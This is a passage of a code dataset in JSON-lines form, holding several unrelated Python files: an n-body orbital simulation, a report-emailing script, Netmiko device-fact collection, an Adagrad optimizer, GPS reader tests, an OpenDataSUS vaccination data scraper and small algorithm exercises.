astronomical unit\nMSun = 1.98847 * 10**30 # solar mass\nyr = 31556952 # year\n\n# function which returns derivative at given time\ndef func_r_v_dot(r_v,t,N_obj,m): # r_v (positions and velocities) and m (masses) should numpy arrays\n r_v = np.array(r_v) # shape (N_obj*6)\n m = np.array(m)\n\n r_v_dot = np.zeros((N_obj,6))\n\n assert r_v.shape == (N_obj*6,)\n assert m.shape == (N_obj,)\n\n r_v = np.reshape(r_v,(N_obj,6)) # shape N_obj X 6\n\n for i in range(N_obj):\n r_i = r_v[i,0:3]\n v_i = r_v[i,3:6]\n m_i = m[i]\n a_i = np.zeros(3)\n for j in range(N_obj):\n if i!=j:\n r_j = r_v[j,0:3]\n v_j = r_v[j,3:6]\n m_j = m[j]\n r_ij = r_i-r_j\n r_ij_norm = np.linalg.norm(r_ij)\n a_ij_0 = -G*m_j*r_ij/r_ij_norm**3 # Newtonian acceleration\n a_ij_1 = 0 # 1PN term\n a_ij_25 = 0 # 2.5PN term\n a_i = a_i + a_ij_0 + a_ij_1/c**2 + a_ij_25/c**5\n r_v_dot[i,0:3] = v_i\n r_v_dot[i,3:6] = a_i\n\n r_v_dot = np.reshape(r_v_dot,(N_obj*6)) # shape (N_obj*6)\n return r_v_dot\n\n# function which returns adaptive time-steps\ndef func_adapt_dt(r_v,N_obj,m): # r_v (positions and velocities) and m (masses) should numpy arrays\n r_v = np.array(r_v) # shape (N_obj*6)\n m = np.array(m)\n eps = 0\n\n dt = yr # standard time-step\n\n assert r_v.shape == (N_obj*6,)\n assert m.shape == (N_obj,)\n\n r_v = np.reshape(r_v,(N_obj,6)) # shape N_obj X 6\n\n for i in range(N_obj):\n r_i = r_v[i,0:3]\n v_i = r_v[i,3:6]\n m_i = m[i]\n for j in range(N_obj):\n if i!=j:\n r_j = r_v[j,0:3]\n v_j = r_v[j,3:6]\n m_j = m[j]\n r_ij = r_i-r_j+eps \n v_ij = v_i-v_j\n r_ij_norm = np.linalg.norm(r_ij)\n v_ij_norm = np.linalg.norm(v_ij)\n a_ij_norm = G*m_j/r_ij_norm**2\n if v_ij_norm == 0 and a_ij_norm != 0:\n dt_min = np.sqrt(r_ij_norm/a_ij_norm)\n elif v_ij_norm != 0 and a_ij_norm == 0:\n dt_min = r_ij_norm/v_ij_norm\n elif v_ij_norm != 0 and a_ij_norm != 0:\n dt_min = min([r_ij_norm/v_ij_norm,np.sqrt(r_ij_norm/a_ij_norm)]) # approximate timescale which needs to be resolved\n else:\n dt_min = dt\n if dt_min < dt:\n dt = dt_min\n return dt\n\n# binary\n# gifsave = \"binary.gif\"\n# min_xyz,max_xyz = -150,150\n# N_obj = 2\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([10,30])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 80*AU\n# v_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [0,r_12*m[1]/np.sum(m),0]\n# r_v_0[3:6] = [e_fac*v_12*m[1]/np.sum(m),0,0]\n# r_v_0[6:9] = [0,-r_12*m[0]/np.sum(m),0]\n# r_v_0[9:12] = [- e_fac*v_12*m[0]/np.sum(m),0,0]\n\n\n# triple\ngifsave = \"triple.gif\"\nmin_xyz,max_xyz = -150,150\nN_obj = 3\n# m = np.ones(N_obj)*10*MSun\nm = np.array([30,10,20])*MSun\ne_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\nr_12 = 15*AU\nv_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\nr_in12_3 = 100*AU\nv_in12_3 = np.sqrt(G*np.sum(m)/r_in12_3)\nr_v_0 = np.zeros(N_obj*6)\nr_v_0[0:3] = [0, r_in12_3*(m[2]/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\nr_v_0[3:6] = [e_fac*v_in12_3*(m[2]/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, 0]\nr_v_0[6:9] = [0, r_in12_3*(m[2]/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\nr_v_0[9:12] = [e_fac*v_in12_3*(m[2]/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, 0]\nr_v_0[12:15] = [0, - r_in12_3*(np.sum(m[0:2])/np.sum(m)), 0]\nr_v_0[15:18] = [- e_fac*v_in12_3*(np.sum(m[0:2])/np.sum(m)), 0, 0]\n\n\n# 2+2 quadruple\n# gifsave = \"2+2_quadruple.gif\"\n# min_xyz,max_xyz = -150,150\n# N_obj = 4\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([40,20,30,10])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 10*AU\n# v_12 = 
np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_34 = 10*AU\n# v_34 = np.sqrt(G*np.sum(m[2:4])/r_34)\n# r_in12_in34 = 100*AU\n# v_in12_in34 = np.sqrt(G*np.sum(m)/r_in12_in34)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [0, r_in12_in34*(np.sum(m[2:4])/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\n# r_v_0[3:6] = [e_fac*v_in12_in34*(np.sum(m[2:4])/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, 0]\n# r_v_0[6:9] = [0, r_in12_in34*(np.sum(m[2:4])/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\n# r_v_0[9:12] = [e_fac*v_in12_in34*(np.sum(m[2:4])/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, 0]\n# r_v_0[12:15] = [0, - r_in12_in34*(np.sum(m[0:2])/np.sum(m)), r_34*(m[3]/np.sum(m[2:4]))]\n# r_v_0[15:18] = [- e_fac*v_in12_in34*(np.sum(m[0:2])/np.sum(m)) + e_fac*v_34*(m[3]/np.sum(m[2:4])), 0, 0]\n# r_v_0[18:21] = [0, - r_in12_in34*(np.sum(m[0:2])/np.sum(m)), - r_34*(m[2]/np.sum(m[2:4]))]\n# r_v_0[21:24] = [- e_fac*v_in12_in34*(np.sum(m[0:2])/np.sum(m)) - e_fac*v_34*(m[2]/np.sum(m[2:4])), 0, 0]\n\n\n# 3+1 quadruple\n# gifsave = \"3+1_quadruple.gif\"\n# min_xyz,max_xyz = -500,500\n# N_obj = 4\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([40,10,30,20])*MSun\n# e_fac = 1.2 # np.sqrt(2) is the limit, 1 is circular\n# r_12 = 20*AU\n# v_12 = np.sqrt(G*np.sum(m[0:2])/r_12)\n# r_in12_3 = 80*AU\n# v_in12_3 = np.sqrt(G*np.sum(m[0:3])/r_in12_3)\n# r_mid123_4 = 350*AU\n# v_mid123_4 = np.sqrt(G*np.sum(m)/r_mid123_4)\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [r_in12_3*(m[2]/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), r_12*(m[1]/np.sum(m[0:2]))]\n# r_v_0[3:6] = [e_fac*v_mid123_4*(m[3]/np.sum(m)) + e_fac*v_12*(m[1]/np.sum(m[0:2])), 0, e_fac*v_in12_3*(m[2]/np.sum(m[0:3]))]\n# r_v_0[6:9] = [r_in12_3*(m[2]/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), - r_12*(m[0]/np.sum(m[0:2]))]\n# r_v_0[9:12] = [e_fac*v_mid123_4*(m[3]/np.sum(m)) - e_fac*v_12*(m[0]/np.sum(m[0:2])), 0, e_fac*v_in12_3*(m[2]/np.sum(m[0:3]))]\n# r_v_0[12:15] = [- r_in12_3*(np.sum(m[0:2])/np.sum(m[0:3])), r_mid123_4*(m[3]/np.sum(m)), 0]\n# r_v_0[15:18] = [e_fac*v_mid123_4*(m[3]/np.sum(m)), 0, - e_fac*v_in12_3*(np.sum(m[0:2])/np.sum(m[0:3]))]\n# r_v_0[18:21] = [0, - r_mid123_4*(np.sum(m[0:3])/np.sum(m)), 0]\n# r_v_0[21:24] = [- e_fac*v_mid123_4*(np.sum(m[0:3])/np.sum(m)), 0, 0]\n\n# Pythagorean 3-body\n# gifsave = \"pythagorean.gif\"\n# min_xyz,max_xyz = -50,50\n# N_obj = 3\n# # m = np.ones(N_obj)*10*MSun\n# m = np.array([3.0,4.0,5.0])*MSun\n# r_v_0 = np.zeros(N_obj*6)\n# r_v_0[0:3] = [10.0*AU , 30.0*AU , 0.0*AU]\n# r_v_0[3:6] = [0.0 , 0.0 , 0.0]\n# r_v_0[6:9] = [-20.0*AU , -10.0*AU , 0.0*AU]\n# r_v_0[9:12] = [0.0 , 0.0 , 0.0]\n# r_v_0[12:15] = [10.0*AU , -10.0*AU , 0.0*AU]\n# r_v_0[15:18] = [0.0 , 0.0 , 0.0]\n\n\nN_steps = 1000\n\nt = np.zeros(N_steps+1)\nr_v_total = np.zeros((N_steps+1,N_obj,6)) # stores positions and velocities after each time-step\nr_v_total[0,:,:] = np.reshape(r_v_0,(N_obj,6))\n\nr_v_evolve = r_v_0 # position and velocity at a given evolution time\nfor step in range(N_steps):\n dt_evolve = func_adapt_dt(r_v_evolve,N_obj,m)\n r_v_evolve = odeint(func_r_v_dot,r_v_evolve,[0,dt_evolve],args=(N_obj,m))[1] # shape 1 X (N_obj*6) -- (0th element is not relevant)\n\n t[step+1] = t[step]+dt_evolve\n r_v_total[step+1,:,:] = np.reshape(r_v_evolve,(N_obj,6))\n\nprint(t[-1]/yr,\"yr evolution time\")\n\nplt.style.use('dark_background')\n\nfig = plt.figure(figsize=(10,10))\n# ax = p3.Axes3D(fig,auto_add_to_figure=False)\n# fig.add_axes(ax)\nax = fig.add_subplot(projection='3d')\nax.grid(None)\nax.w_xaxis.pane.fill = False\nax.w_yaxis.pane.fill = 
False\nax.w_zaxis.pane.fill = False\n\ntrajectories = [ax.plot([],[],[],lw=1,alpha=0.7,color='C%d'%(i))[0] for i in range(N_obj)]\nparticles = [ax.plot([],[],[],'o',markersize=np.sqrt(m[i]/MSun)*2,color='C%d'%(i))[0] for i in range(N_obj)]\nax.set_title('t = %.0f yr'%(t[0]/yr),fontsize=25)\n\n# function to update matplotlib plot for each frame\ndef animate(t_step,N_obj,r_v,trajectories,particles,t):\n for i in range(N_obj):\n r = r_v[0:t_step+1,i,0:3]/AU # shape * X 3\n\n ax.set_title('t = %.0f yr'%(t[t_step]/yr),fontsize=25)\n\n trajectories[i].set_data(r[:,0],r[:,1]) # X and Y axes\n trajectories[i].set_3d_properties(r[:,2]) # Z axis\n\n particles[i].set_data(r[t_step:t_step+1,0],r[t_step:t_step+1,1]) # X and Y axes\n particles[i].set_3d_properties(r[t_step:t_step+1,2]) # Z axis\n\n# animate N_steps frames with interval 1ms between frames\nanim = animation.FuncAnimation(fig, animate, frames=N_steps+1, fargs=(N_obj,r_v_total,trajectories,particles,t), interval=1, blit=False)\n\n# ax.view_init(azim=90, elev=0)\nax.set_xlim3d([min_xyz,max_xyz])\nax.set_xlabel('X [AU]',fontsize=15)\nax.set_ylim3d([min_xyz,max_xyz])\nax.set_ylabel('Y [AU]',fontsize=15)\nax.set_zlim3d([min_xyz,max_xyz])\nax.set_zlabel('Z [AU]',fontsize=15)\n\nplt.show()\nanim.save('./gif/%s'%(gifsave))\n\n# CONVERT GIF TO MP4\n# ffmpeg -r 50 -i anim.gif anim.mp4","repo_name":"cheyanneshariat/OSPE_Scripts","sub_path":"nbody.py","file_name":"nbody.py","file_ext":"py","file_size_in_byte":9108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2197947298","text":"'''\nScript to process supplier fruit description data from \nsupplier-data/descriptions directory. \n'''\n\nimport os\nimport datetime\nimport reports\nimport emails\n\nfolder = \"supplier-data/descriptions/\"\nattachment = \"/tmp/processed.pdf\"\n\ndef main():\n # Process the data\n date = datetime.datetime.now()\n report_title = \"Processed Update on {} {}, {}\".format(\n date.strftime(\"%d\"), date.strftime(\"%B\"), date.strftime(\"%Y\"))\n paragraph = {}\n for file in os.listdir(folder):\n lines = open(folder + file, 'r').read().splitlines()\n paragraph[lines[0].strip()] = lines[1].strip()\n # Generate Pdf\n reports.generate_report(attachment, report_title, paragraph)\n # Send the email\n sender = \"automation@example.com\"\n receiver = \"{}@example.com\".format(os.environ.get('USER'))\n body = \"All fruits are uploaded to our website successfully. 
A detailed list is attached to this email.\"\n subject = \"Upload Completed - Online Fruit Store\"\n message = emails.generate_email(attachment, sender, receiver, body, subject)\n emails.send_email(message)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Asra2000/Quicklab-Course6","sub_path":"lab4/report_email.py","file_name":"report_email.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29697957255","text":"\r\nimport app.Modules.connection as ConnectWith\r\nimport app.base.routes as Credentials\r\nimport app.Database.DbOperations as DbOps\r\nfrom netmiko import ConnectHandler, ssh_exception\r\nimport csv\r\n\r\nsession = None\r\n\r\ndef send_command(command, expect_string=None):\r\n \"\"\"Send Netmiko commands\"\"\"\r\n\r\n get_response = None\r\n\r\n retries = 0\r\n while retries != 3:\r\n try:\r\n get_response = session.send_command(command)\r\n break\r\n except (OSError, TypeError, AttributeError, ssh_exception.NetmikoTimeoutException):\r\n retries += 1\r\n\r\n return get_response\r\n\r\n\r\ndef get_serial_model(session_obj):\r\n \"\"\"Get device serial number and model\"\"\"\r\n\r\n global session\r\n\r\n session = session_obj\r\n serial = None\r\n model = None\r\n\r\n show_inventory = send_command('show inventory')\r\n\r\n for i in show_inventory.splitlines():\r\n\r\n if i.rfind('Chassis') != -1:\r\n model = i.split(\"\\\"\")[3].split(' ')[1]\r\n elif i.rfind('NAME') != -1:\r\n model = i.split(\"\\\"\")[1]\r\n\r\n if i.rfind('SN') != -1:\r\n serial = i.split('SN: ')[1]\r\n break\r\n\r\n return serial, model\r\n\r\n\r\ndef get_uptime_software(session_obj):\r\n \"\"\"Get device uptime and software\"\"\"\r\n\r\n global session\r\n\r\n session = session_obj\r\n uptime = None\r\n software = None\r\n show_version = send_command('show version')\r\n\r\n for i in show_version.splitlines():\r\n if i.rfind('Uptime') != -1:\r\n uptime = i.split(\"is\")[2]\r\n break\r\n elif i.rfind('RELEASE SOFTWARE') != -1:\r\n software = i\r\n\r\n return uptime, software\r\n\r\ndef import_csv_bulk(path, filename):\r\n \"\"\"Parse data from csv file upload, write to database devicefacts_front_end table\"\"\"\r\n\r\n with open(path) as file:\r\n for row_id, row in enumerate(csv.reader(file)):\r\n if row_id != 0:\r\n try:\r\n netmiko_session = ConnectWith.creat_netmiko_connection(row[1], row[2], row[0], row[3])\r\n serial_model = get_serial_model(netmiko_session)\r\n uptime_software = get_uptime_software(netmiko_session)\r\n update_facts = DbOps.update_device_facts(row[0], serial_model[0], serial_model[1], uptime_software[0],\r\n uptime_software[1], row[1], row[2], row[3], row[4])\r\n except IndexError:\r\n pass\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cober2019/IOS-XE-Ops","sub_path":"XEOpsDatabase/app/Modules/GetFacts.py","file_name":"GetFacts.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"16766285209","text":"import string\n\nfile_contents = \"In the control room was silence like fabric strained to \\\n the verge oftearing. 
Softly through the weave of it came the murmur of \\\n the engines, fretful, unhappy, the whimper of something sick.\"\n\ndef calculate_frequencies(file_contents):\n # Here is a list of punctuations and uninteresting words you can use to process your text\n punctuations = '''!()-[]{};:'\"\\,<>./?@#$%^&*_~'''\n uninteresting_words = [\"the\", \"a\", \"to\", \"if\", \"is\", \"it\", \"of\", \"and\", \"or\", \"an\", \"as\", \"i\", \"me\", \"my\", \\\n \"we\", \"our\", \"ours\", \"you\", \"your\", \"yours\", \"he\", \"she\", \"him\", \"his\", \"her\", \"hers\", \"its\", \"they\", \"them\", \\\n \"their\", \"what\", \"which\", \"who\", \"whom\", \"this\", \"that\", \"am\", \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \\\n \"have\", \"has\", \"had\", \"do\", \"does\", \"did\", \"but\", \"at\", \"by\", \"with\", \"from\", \"here\", \"when\", \"where\", \"how\", \\\n \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"some\", \"such\", \"no\", \"nor\", \"too\", \"very\", \"can\", \"will\", \"just\"]\n\n # LEARNER CODE START HERE\n words = file_contents.lower().split()\n words = [''.join(c for c in s if c not in string.punctuation) for s in words]\n words = [''.join(c for c in s if c not in uninteresting_words) for s in words]\n\n print(words)\n # frequency = [words.count(i) for i in words]\n\ncalculate_frequencies(file_contents)","repo_name":"jstoveld/pylearning","sub_path":"final project/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43827957064","text":"from typing import Iterable\n\nimport numpy as np\nfrom edugrad.optim import Optimizer, SGD\nfrom edugrad.tensor import Tensor\n\nclass Adagrad(Optimizer):\n\n def __init__(self, params: Iterable[Tensor], lr: float = 1e-2):\n super(Adagrad, self).__init__(params)\n self.lr = lr\n self._eps = 1e-7\n # initialize squared gradient history for each param\n for param in self.params:\n param._grad_hist = np.zeros(param.value.shape)\n\n def step(self):\n for param in self.params:\n # DONE: implement here\n # increment squared gradient history; param.grad contains the gradient\n # get adjusted learning rate\n # update parameters\n param._grad_hist += np.square(param.grad)\n adjusted_lr = self.lr / (np.sqrt(param._grad_hist) + self._eps)\n param.value -= adjusted_lr * param.grad\n self._cur_step += 1\n","repo_name":"HanfeiChen/ling575k","sub_path":"hw4/optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9826448529","text":"import contextlib\nfrom dataclasses import dataclass\nfrom contextvars import ContextVar\nfrom typing import Optional\n\nimport pytest\n\n\n@dataclass\nclass Icecream:\n flavor: str\n\n\nicecream_context = ContextVar[Optional[Icecream]](\"icecream_context\", default=None)\n\n\ndef get_current_icecream() -> Icecream:\n icecream = icecream_context.get()\n if icecream is None:\n raise RuntimeError(\"No icecream in context\")\n\n return icecream\n\n\n@contextlib.contextmanager\ndef using_icecream(icecream: Icecream):\n token = icecream_context.set(icecream)\n try:\n yield\n finally:\n icecream_context.reset(token)\n\n\ndef create_icecream_text():\n icecream = get_current_icecream()\n return f\"I'm eating {icecream.flavor} icecream\"\n\n\ndef test_create_icecream_text():\n with using_icecream(Icecream(\"chocolate\")):\n assert create_icecream_text() == \"I'm 
eating chocolate icecream\"\n\n\ndef test_create_icecream_text_without_context():\n with pytest.raises(RuntimeError) as excinfo:\n create_icecream_text()\n\n assert \"No icecream in context\" in str(excinfo.value)\n\n\ndef test_create_icecream_text_with_context():\n with using_icecream(Icecream(\"chocolate\")):\n text_1 = create_icecream_text()\n with using_icecream(\n Icecream(\"vanilla\")\n ): ## Note that the chocolate icecream is overwritten by the vanilla icecream until the context is reset\n text_2 = create_icecream_text()\n\n text_3 = create_icecream_text()\n\n assert text_1 == \"I'm eating chocolate icecream\"\n assert text_2 == \"I'm eating vanilla icecream\"\n assert text_3 == \"I'm eating chocolate icecream\"\n","repo_name":"LuscasLeo/poc-using-context-vars","sub_path":"context_vars_poc/test_icecream.py","file_name":"test_icecream.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73833882824","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author : haymai\n\n\"\"\"\n你想通过串行端口读写数据,典型场景就是和一些硬件设备打交道 (比如一个机器\n人或传感器)。\n\"\"\"\nimport serial\n\nif __name__ == '__main__':\n ser = serial.Serial('/dev/tty.usbmodem641', # Device name varies\n baudrate=9600,\n bytesize=8,\n parity='N',\n stopbits=1)\n\n ser.write(b'G1 X50 Y50\\r\\n')\n resp = ser.readline()","repo_name":"haymaicc/python-cookbook-demo","sub_path":"chapter-05/_pyserial.py","file_name":"_pyserial.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"20526622758","text":"from Interfacing.GPSReader import GPSReader\nfrom Logging.GPSLogger import GPSLogger\nimport csv\nimport sys\nimport pytest\n\n\nPORTS = {'win32': 'COM5', 'linux': '/dev/ttyACM0'}\n\n\n@pytest.fixture(params=['def'])\ndef tmp_file(tmp_path, request):\n if request.param == None:\n return None\n else:\n return tmp_path / ('gps_test.csv' if request.param == 'def' else request.param)\n\n@pytest.fixture\ndef port():\n return PORTS[sys.platform]\n\n@pytest.fixture\ndef gps(tmp_file):\n with GPSReader(tmp_file) as gps:\n yield gps\n \n \ndef test_init_ser(gps, port):\n assert gps.port == port, 'Port not set correctly. 
Maybe Serial failed to open.'\n\n\n@pytest.mark.parametrize('tmp_file', [None, 'def'], indirect=True)\ndef test_init_log(gps, tmp_file):\n assert gps.log_file == tmp_file\n assert gps.headers == (GPSLogger.HEADERS if tmp_file else None)\n assert gps.has_logger == (tmp_file != None)\n\n\n@pytest.mark.parametrize('tmp_file', [None, 'def'], indirect=True)\ndef test_readline(gps):\n assert gps.readline().sentence_type\n assert gps.readline(True).sentence_type\n\n\ndef test_readline_logging(gps):\n data = [gps.readline(True) for _ in range(15)]\n gps_data = [sen for sen in data if sen.sentence_type == 'GGA' or sen.sentence_type == 'GLL']\n\n assert len(data) == 15, f'Expected 15 lines of data, got {len(data)}'\n assert len(gps_data) > 0, 'No GGA or GLL sentences found'\n\n with gps.log_file.open('r') as file:\n reader = csv.reader(file, delimiter=',')\n headers, *rows = [i for i in reader]\n\n assert headers == gps.headers, 'Headers were not written to file: file writing is broken'\n assert len(rows) == len(gps_data), 'Not all gps data lines were logged'\n\n for sen, row in zip(gps_data, rows):\n assert len(row) == 4, 'Logged line does not contain required columns'\n assert str(sen.timestamp) == row[0], 'Timestamp not logged'\n assert str(sen.lat) == row[1], 'Latitude not logged'\n assert str(sen.lon) == row[2], 'Longitude not logged'\n assert str(getattr(sen, 'altitude', '')) == row[3], 'Altitude not logged'\n","repo_name":"alonso-herreros/CanSat-raspberrypi","sub_path":"code/Tests/GPSReader_test.py","file_name":"GPSReader_test.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13774900470","text":"class Solution:\n def findSubsequences(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n\n if not nums:\n return []\n\n res = set()\n\n def dfs(idx, sub):\n if nums[idx] >= sub[-1]:\n res.add(tuple(sub + [nums[idx]]))\n if idx + 1 < len(nums):\n dfs(idx + 1, sub + [nums[idx]])\n\n if idx + 1 < len(nums):\n dfs(idx + 1, sub)\n\n for i, n in enumerate(nums[:-1]):\n dfs(i+1, [n])\n\n return list(res)\n","repo_name":"juiyangchang/LeetCoding","sub_path":"python/491_Increasing_Subsequences.py","file_name":"491_Increasing_Subsequences.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6114097887","text":"#Importando as bibliotecas necessárias\nimport requests\nimport json\nimport base64\nimport pandas as pd\nfrom datetime import datetime\n\n# URL da API do OpendataSUS\nurl = 'https://imunizacao-es.saude.gov.br/_search'\n\n# Credenciais de acesso\nusername = 'imunizacao_public'\npassword = 'qlto5t&7r_@+#Tlstigi'\n\n# Codificando as credenciais para Base64\nauth_str = f'{username}:{password}'\nbase64_auth_str = base64.b64encode(auth_str.encode()).decode()\n\n#Escolhendo o tamanho de 10000 linhas com informacoes da API, segundo o manual do OpendataSUS\ntamanho = json.dumps({\n 'size':10000\n})\n\n# Criando uma sessão para lidar com o cookie\nsession = requests.Session()\nsession.headers.update({\n 'Authorization': f'Basic {base64_auth_str}',\n 'Content-Type': 'application/json'\n})\n\n# Enviar solicitação POST para acessar os dados\nacesso = session.post(url,data=tamanho)\n\n#Armazenando os dados em formato json em uma variavel\ndados = acesso.json()\n\n#Funcao para visualizar melhor os dados em json\ncovid = 
pd.json_normalize(dados['hits']['hits'])\n#print(covid)\n\ndata_da_vacina = covid['_source.vacina_dataAplicacao']\n#print(data_da_vacina)\n#print(type(data_da_vacina))\n\n#Convertendo series para string\ndata_str = data_da_vacina.to_string(index=False)\n#print(data_str)\n#print(type(data_str))\n\n#Dividindo a string em linhas\nlinhas = data_str.splitlines()\n#print(linhas)\n\n#Criando lista para armazenar as datas depois de fazer a conversão\ndatas_formatadas = []\n\nfor i in linhas:\n#Convertendo string de data para data no formato de números inteiros\n data_e_hora = datetime.strptime(i,'%Y-%m-%dT%H:%M:%S.%fZ').strftime('%Y-%m-%d')\n datas_formatadas.append(data_e_hora) \n\n#Definindo as variaveis que serão salvas num novo dataframe\ndata_nascimento = covid['_source.paciente_dataNascimento']\nestabelecimento = covid['_source.estabelecimento_razaoSocial']\nuf_estabelecimento = covid['_source.estabelecimento_uf']\nuf_paciente= covid['_source.paciente_endereco_uf']\nlote_vacina = covid['_source.vacina_lote']\ncodigo_raca_paciente = covid['_source.paciente_racaCor_codigo']\nnome_estabelecimento = covid['_source.estalecimento_noFantasia']\nfabricante_vacina = covid['_source.vacina_fabricante_nome']\ndose_vacina = covid['_source.vacina_descricao_dose']\nnumero_dose_vacina = covid['_source.vacina_numDose']\ngenero_paciente = covid['_source.paciente_enumSexoBiologico']\nidade_paciente = covid['_source.paciente_idade']\nnome_vacina = covid['_source.vacina_nome']\netnia_paciente = covid['_source.paciente_racaCor_valor']\nendereco_paciente = covid['_source.paciente_endereco_nmPais']\nmunicipio_estabelecimento = covid['_source.estabelecimento_municipio_nome']\ncodigo_vacina = covid['_source.vacina_codigo']\ndatas = datas_formatadas\n\n#Criando um novo dataframe extraindo apenas as variáveis de interesse do API do OpenDataSus\ndf_covid = pd.DataFrame(data={'DataNascimento':data_nascimento,'Estabelecimento':estabelecimento,'UF':uf_estabelecimento,'UFPaciente':uf_paciente,'LoteVacina':lote_vacina,'CodigoEtniaPaciente':codigo_raca_paciente,'NomeEstabelecimento':nome_estabelecimento,'FabricanteVacina':fabricante_vacina,'DoseVacina':dose_vacina,'NumeroDose':numero_dose_vacina,'Genero Paciente':genero_paciente,'Idade Paciente':idade_paciente,'Nome Vacina':nome_vacina,'EtniaPaciente':etnia_paciente,'EnderecoPaciente':endereco_paciente,'Municipio':municipio_estabelecimento,'CodigoVacina':codigo_vacina,'DataAplicacao':datas})\n#print(df_covid)\n\n# Convertendo a coluna 'DataAplicacao' para o formato de data do pandas\ndf_covid['DataAplicacao'] = pd.to_datetime(df_covid['DataAplicacao'])\n#print(df_covid)\n\n#Filtrar os dados com as condições desejadas para um determinado municipio em um determinado período de tempo\nfiltro_data = df_covid['DataAplicacao'] < pd.to_datetime('2023-01-01')\nfiltro_municipio = df_covid['Municipio'] == 'SAO PAULO'\ndf_filtrado = df_covid[filtro_data & filtro_municipio]\n\n# Criar um novo DataFrame com as colunas de interesse para serem salvas em uma planilha\ncolunas_interesse = ['EtniaPaciente', 'DataAplicacao', 'Municipio']\ndf_final = df_filtrado[colunas_interesse]\n\n#Criar uma nova planilha Excel\ncovid_excel = 'covid_vacinacao.xlsx'\nwriter = pd.ExcelWriter(covid_excel, engine='openpyxl')\n\n#Escrevendo os dados na planilha Excel em colunas distintas\ndf_final.to_excel(writer, sheet_name='Vacinacao', index=False)\n\n# Salvar a planilha Excel\nwriter.save()\nprint('Concluiu?')\n\n############################################################################\n# RODAR:python3 
api_covidgov.py \n############################################################################\n","repo_name":"wilmorales21/Scripts","sub_path":"APIs/api_covidgov.py","file_name":"api_covidgov.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72807751625","text":"import math\nimport sys\nimport heapq\n\nparents = []\n\n\ndef get_parent(node):\n start = node\n while node != parents[node]:\n node = parents[node]\n parents[start] = node\n return node\n\n\ndef solution(N, points):\n heap = []\n global parents\n parents = [i for i in range(N + 1)]\n for i in range(N):\n a1, b1 = points[i]\n for j in range(i + 1, N):\n a2, b2 = points[j]\n heapq.heappush(heap, (math.sqrt(abs(a1 - a2) ** 2 + abs(b1 - b2) ** 2), i + 1, j + 1))\n answer = 0\n cnt = 0\n while heap:\n dist, a, b = heapq.heappop(heap)\n parent_a = get_parent(a)\n parent_b = get_parent(b)\n if parent_b != parent_a:\n cnt += 1\n if parent_a > parent_b:\n parents[parent_b] = parent_a\n else:\n parents[parent_a] = parent_b\n answer += dist\n if cnt == N:\n break\n\n print(round(answer, 2))\n\n\ndef main():\n N = int(sys.stdin.readline().rstrip())\n points = []\n for _ in range(N):\n points.append(list(map(float, sys.stdin.readline().rstrip().split())))\n solution(N, points)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fineman999/Algorithm","sub_path":"BaekJoon/Gold/Level3/make_star.py","file_name":"make_star.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33361263819","text":"from copy import deepcopy\nfrom pprint import pprint\nfrom aocd import get_data\nfrom time import time\nimport re\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# --- Day 22: --- #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # 